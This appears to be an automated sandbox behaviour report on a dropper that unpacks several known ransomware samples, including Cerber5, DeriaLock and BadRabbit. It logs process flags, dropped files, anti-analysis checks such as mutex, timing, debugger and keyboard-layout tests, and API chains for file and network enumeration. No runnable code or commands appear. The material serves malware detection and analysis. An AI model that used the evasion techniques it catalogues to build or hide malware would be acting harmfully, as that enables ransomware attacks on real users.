Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking mutex)

Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe

Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess

Source: C:\Windows\SysWOW64\rundll32.exe

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

graph_3-5779

Source: C:\Users\user\Desktop\irH9zMhZub.exe TID: 2608	Thread sleep count: 68 > 30			Jump to behavior
Source: C:\Users\user\Desktop\irH9zMhZub.exe TID: 2608	Thread sleep time: -68000s >= -30000s			Jump to behavior

Source: C:\Users\user\Desktop\irH9zMhZub.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Source: C:\Windows\5753.tmp	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess

Source: C:\Windows\SysWOW64\rundll32.exe	Thread delayed: delay time: 900000			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread delayed: delay time: 300000			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 19_2_00408000 GetKeyboardLayoutList followed by cmp: cmp dword ptr [ebp-08h], edx and CTI: jbe 004080DFh	19_2_00408000
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 19_2_00408000 GetKeyboardLayoutList followed by cmp: cmp esi, eax and CTI: jc 004080C5h	19_2_00408000
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 40_2_00408000 GetKeyboardLayoutList followed by cmp: cmp dword ptr [ebp-08h], edx and CTI: jbe 004080DFh	40_2_00408000
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 40_2_00408000 GetKeyboardLayoutList followed by cmp: cmp esi, eax and CTI: jc 004080C5h	40_2_00408000

Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe

API coverage: 6.4 %

Source: C:\Users\user\Desktop\irH9zMhZub.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Endermanch@InfinityCrypt.exe	Jump to dropped file
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Endermanch@Krotten.exe	Jump to dropped file
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Fantom.exe	Jump to dropped file
Source: C:\Users\user\Desktop\irH9zMhZub.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Endermanch@NoMoreRansom.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	Dropped PE file which has not been started: C:\Windows\cscc.dat	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	Dropped PE file which has not been started: C:\Windows\dispci.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe

Code function: 19_2_004063E1 rdtsc

19_2_004063E1

Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe

Evaded block: after key decision

Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe

Evasive API call chain: RegOpenKey,DecisionNodes,ExitProcess

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetAdaptersInfo,NetServerGetInfo,NetApiBufferFree,	3_2_007B7D4E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: memset,memset,GetAdaptersInfo,GetAdaptersInfo,LocalAlloc,GetAdaptersInfo,inet_addr,inet_addr,inet_addr,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,htonl,LocalAlloc,inet_addr,htonl,htonl,CreateThread,CloseHandle,LocalFree,	3_2_007B8B2E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetAdaptersInfo,GetComputerNameExW,DhcpEnumSubnets,DhcpGetSubnetInfo,DhcpEnumSubnetClients,htonl,htonl,htonl,inet_ntoa,GetProcessHeap,HeapFree,DhcpRpcFreeMemory,DhcpRpcFreeMemory,	3_2_007B8D39

Source: C:\Windows\SysWOW64\rundll32.exe	Thread delayed: delay time: 900000			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread delayed: delay time: 300000			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\5753.tmp	API call chain: ExitProcess graph end node

Source: rundll32.exe, 00000003.00000002.336952280.00000000042B7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Endermanch@Cerber5.exe, 00000013.00000003.395027648.0000000001794000.00000004.00000020.00020000.00000000.sdmp, Endermanch@Cerber5.exe, 00000013.00000002.419847472.0000000001794000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\5753.tmp

Process information queried: ProcessInformation

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_007B5A73 GetSystemInfo,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,MapViewOfFile,CryptDuplicateHash,CryptHashData,LocalAlloc,CryptGetHashParam,LocalFree,CryptDestroyHash,UnmapViewOfFile,

3_2_007B5A73

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007B5E9F PathCombineW,FindFirstFileW,WaitForMultipleObjects,PathCombineW,StrStrIW,PathFindExtensionW,FindNextFileW,FindClose,	3_2_007B5E9F
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 19_2_00409857 CoInitialize,GetSystemDirectoryW,SHGetFileInfoW,lstrlenW,SHGetFileInfoW,lstrlenW,SHGetFolderPathW,FindFirstFileW,lstrlenW,CharLowerBuffW,FindNextFileW,FindClose,	19_2_00409857
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 19_2_0040A419 wsprintfW,GetFileAttributesW,GetFileSecurityW,GetSecurityDescriptorOwner,EqualSid,GetFileAttributesW,SetFileAttributesW,lstrcatW,GetFileAttributesW,SetFileAttributesW,FindFirstFileW,WaitForSingleObject,lstrlenW,lstrlenW,CharLowerBuffW,Sleep,StrChrW,FindNextFileW,FindClose,	19_2_0040A419
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 19_2_00401423 lstrlenW,FindFirstFileW,PathMatchSpecW,FindNextFileW,	19_2_00401423
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 40_2_00409857 CoInitialize,GetSystemDirectoryW,SHGetFileInfoW,lstrlenW,SHGetFileInfoW,lstrlenW,SHGetFolderPathW,FindFirstFileW,lstrlenW,CharLowerBuffW,FindNextFileW,FindClose,	40_2_00409857
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 40_2_0040A419 wsprintfW,GetFileAttributesW,GetFileSecurityW,GetSecurityDescriptorOwner,EqualSid,GetFileAttributesW,SetFileAttributesW,lstrcatW,GetFileAttributesW,SetFileAttributesW,FindFirstFileW,WaitForSingleObject,lstrlenW,lstrlenW,CharLowerBuffW,Sleep,StrChrW,FindNextFileW,FindClose,	40_2_0040A419
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 40_2_00401423 lstrlenW,FindFirstFileW,PathMatchSpecW,FindNextFileW,	40_2_00401423

Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe

File Volume queried: C:\Users\user\Desktop FullSizeInformation

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_007B9016 VirtualProtect,LoadLibraryA,GetProcAddress,VirtualProtect,

3_2_007B9016

Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 19_2_00404FE6 mov eax, dword ptr fs:[00000030h]		19_2_00404FE6
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 40_2_00404FE6 mov eax, dword ptr fs:[00000030h]		40_2_00404FE6

Source: C:\Windows\5753.tmp

Code function: 27_2_00007FF7CEF25540 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

27_2_00007FF7CEF25540

Source: C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe

Code function: 1_2_01321690 GetProcessHeap,

1_2_01321690

Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe

Code function: 19_2_004063E1 rdtsc

19_2_004063E1

Source: C:\Users\user\Desktop\irH9zMhZub.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug	Jump to behavior
